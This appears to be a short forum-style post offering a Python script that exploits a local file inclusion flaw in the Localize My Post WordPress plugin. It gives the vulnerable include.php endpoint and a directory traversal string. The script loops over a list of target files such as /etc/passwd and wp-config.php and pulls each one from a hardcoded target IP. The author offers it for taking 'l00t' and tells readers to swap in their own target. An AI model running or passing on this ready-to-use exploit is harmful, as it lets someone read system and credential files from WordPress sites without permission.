Sort of an odd one, I'm not exactly sure why though.  I wrote this up to exploit an LFI vulnerability in the Localize My Post plugin for WordPress.  You populate the path.txt file with your typical goodies:  /etc/passwd, /etc/hosts, etc.  Each on their own line, of course.  I also included /var/www/html/wp-config.php but for some reason, it wouldn't grab it.  I thought it was some sort of protection mechanism but as I looked around, including in the apache log file, it was getting 200 OK.  I move the file into /etc/ and it works but in place or in /tmp, no luck.  Regardless, it still grabs l00t just change the IP address.  You can just as easily use curl as well -- it's just a bit quicker if you're trying to grab multiple files at once.  


#!/usr/bin/python
import requests
import io
host='http://192.168.90.34/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../..'
filepath = 'path.txt'
with open(filepath) as f:
    line = f.readline()
    while line:
        combined = host+line.strip()
        r = requests.get(combined)
        print r.content
        line = f.readline()
    f.close()